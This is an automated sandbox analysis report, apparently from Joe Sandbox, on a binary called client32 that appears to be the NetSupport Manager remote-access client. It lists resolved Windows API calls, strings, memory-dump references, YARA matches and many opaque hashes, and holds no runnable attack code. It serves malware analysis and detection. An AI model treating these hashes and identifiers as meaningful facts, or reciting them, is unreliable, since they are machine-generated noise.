                                                                              • Instruction Fuzzy Hash: 6C013C716057159FE320EFA9C944B16F7E8EF44B10F21882ED65EC7A90D7B4A480CB90
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,00000000,75BF3760,110F7D8C,?,00000104), ref: 111383C8
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 111383D6
                                                                                • Part of subcall function 11113160: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                • Part of subcall function 11113160: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              • DeleteObject.GDI32(00000000), ref: 1113840A
                                                                              • DeleteObject.GDI32(?), ref: 11138414
                                                                                • Part of subcall function 11095920: _memset.LIBCMT ref: 1109594F
                                                                                • Part of subcall function 11095920: FreeLibrary.KERNEL32(00000000,?,75C04920,11119E07,00000002), ref: 1109595A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
                                                                              • String ID:
                                                                              • API String ID: 370783926-0
                                                                              • Opcode ID: 58e957487a8832166c480bc813a73a45169cf8ddeb5aee4571b3bc3ff4d557d5
                                                                              • Instruction ID: 799c2b35d490dd5e626eaccd758f186befe5f7b991eaf06d61b0359e6872da7a
                                                                              • Opcode Fuzzy Hash: 58e957487a8832166c480bc813a73a45169cf8ddeb5aee4571b3bc3ff4d557d5
                                                                              • Instruction Fuzzy Hash: 8AF02776A0062457D314AB69AD44B2FF3A8EFC5B29B05403CE965A3608DB25F801C7A1
                                                                              APIs
                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomDeleteGlobal$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 964255742-0
                                                                              • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                              • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                              APIs
                                                                                • Part of subcall function 11081C50: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,11081E2A,?,0000005C), ref: 11081C6C
                                                                              • CompareStringA.KERNEL32(00000400,00000000,?,0000000C,?,?,?,?,?,0000000C,?,?,?,?,?,?), ref: 110822FB
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • _strncmp.LIBCMT ref: 1108232F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                              • String ID: {-.
                                                                              • API String ID: 3286074029-1528367491
                                                                              • Opcode ID: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                              • Instruction ID: 42614cb2d1b9d3b778ecc90c9d3306305cb73528e675c69c4a583d3e5576a220
                                                                              • Opcode Fuzzy Hash: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                              • Instruction Fuzzy Hash: 227179A4D0C2D76AEB02CEB44C5036EBFDD8F95208F1881FAECD887241E672D655D3A1
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                              • SetFocus.USER32(?), ref: 11007403
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                              • String ID: edit
                                                                              • API String ID: 1305092643-2167791130
                                                                              • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                              • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                              APIs
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              • GetRegionData.GDI32(?,00001000,?), ref: 11040385
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1231476184-2270926670
                                                                              • Opcode ID: fa938692faa72bfd7a152b515735bbb774d24fd1cc934a4ad490e94894950335
                                                                              • Instruction ID: fcc014cb92af89be413bccaeb8ed5c1d1208fe51c9cebf699e971ae9d8c69b9a
                                                                              • Opcode Fuzzy Hash: fa938692faa72bfd7a152b515735bbb774d24fd1cc934a4ad490e94894950335
                                                                              • Instruction Fuzzy Hash: E8611BB5E001AA9FCB24CF54CC94AD9B3B5FF88344F1042D9E689A7248DAB46E85CF50
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                              • _memmove.LIBCMT ref: 11009336
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                              • String ID: string too long
                                                                              • API String ID: 2168136238-2556327735
                                                                              • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                              • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                              • String ID: string too long
                                                                              • API String ID: 256744135-2556327735
                                                                              • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                              • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 1103A58C
                                                                                • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                              • _strtok.LIBCMT ref: 1103A65C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$__getptd
                                                                              • String ID: ; >
                                                                              • API String ID: 715173073-2207967850
                                                                              • Opcode ID: fcc9817da58d44c692abee018736f6133157bcb5d60b52ba9e7aec99c4f9531c
                                                                              • Instruction ID: dc0b2c440e14d8e9b0893f5a35815c2cc1279532199bfc0e3fbf521271310ba3
                                                                              • Opcode Fuzzy Hash: fcc9817da58d44c692abee018736f6133157bcb5d60b52ba9e7aec99c4f9531c
                                                                              • Instruction Fuzzy Hash: B3315B36D1426AAFDB11CAA48C40BDEBBE4DF84355F154094DC58EB280E731AD8583E1
                                                                              APIs
                                                                              • SetWindowTextA.USER32(?,110BF425), ref: 110BC254
                                                                                • Part of subcall function 11152670: ShowWindow.USER32(?,00000000,110BC1E9,?,AB86ACF8,75BF7AA0,?,00000000,00000000,11185EC0,000000FF,?,110BF425,00000000,?), ref: 11152676
                                                                              Strings
                                                                              • IsA(), xrefs: 110BC23F
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110BC23A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ShowText
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 1551406749-3415836059
                                                                              • Opcode ID: 532d229f29219a7ff6c20e313694b0bfc831fc8ae43d379dc4bc4106dcf9cf0c
                                                                              • Instruction ID: 8a26eee081ce9cd5774bf5fa1ba6d960984ef53363d9d91997ef2c7f0f187873
                                                                              • Opcode Fuzzy Hash: 532d229f29219a7ff6c20e313694b0bfc831fc8ae43d379dc4bc4106dcf9cf0c
                                                                              • Instruction Fuzzy Hash: A8316179A0061A9BCB44DBA8CC90FEEF7F9FF59214F044519E516A3280DB34BA05CBA5
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103B162
                                                                              • _free.LIBCMT ref: 1103B25B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                              • String ID: CLTCONN.CPP
                                                                              • API String ID: 183652615-2872349640
                                                                              • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                              • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110AD1E3
                                                                                • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                              • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                              Strings
                                                                              • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad_memset
                                                                              • String ID: winscard.dll is NOT valid!!!
                                                                              • API String ID: 212038770-1939809930
                                                                              • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                              • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                              • String ID: string too long
                                                                              • API String ID: 963545896-2556327735
                                                                              • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                              • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                              • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText
                                                                              • String ID: ...
                                                                              • API String ID: 3367045223-440645147
                                                                              • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                              • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                              • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                              • _memset.LIBCMT ref: 11039216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$Window$ObjectRectShow_memset
                                                                              • String ID: 562258
                                                                              • API String ID: 3037201586-1021968743
                                                                              • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                              • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000), ref: 11002224
                                                                              • SetCursor.USER32(00000000), ref: 1100222B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: RA
                                                                              • API String ID: 1675784387-580505616
                                                                              • Opcode ID: c3450d3e06a1438185447beb05588274eee249374333314c23ce9c317a90928d
                                                                              • Instruction ID: bc61da0bd6f20267eee6a2bdd2e53f6656b692f616fdfc42b9d5268c008fc473
                                                                              • Opcode Fuzzy Hash: c3450d3e06a1438185447beb05588274eee249374333314c23ce9c317a90928d
                                                                              • Instruction Fuzzy Hash: EB1184B8D081E6F6E709E6F5AC94B3A329C87843C5F40C835F885C9680DA3DE800F634
                                                                              APIs
                                                                              Strings
                                                                              • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                              • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                              • API String ID: 2102423945-1777407139
                                                                              • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                              • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11096565
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11096594
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                              • String ID: vector<T> too long
                                                                              • API String ID: 1785806476-3788999226
                                                                              • Opcode ID: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                              • Instruction ID: d358ddf0df870076cc5f93b669e2da6c265d75c8f3dc5f3c9d6febbcbc9ac7f9
                                                                              • Opcode Fuzzy Hash: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                              • Instruction Fuzzy Hash: B601B5B1A002059FC724CEADDC90CA7B7EDEFD43187148A2EE45A87644DA71F904C750
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                              • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                              • m_hWnd, xrefs: 11015049
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                              • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                              • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                              APIs
                                                                              • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 110143BE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
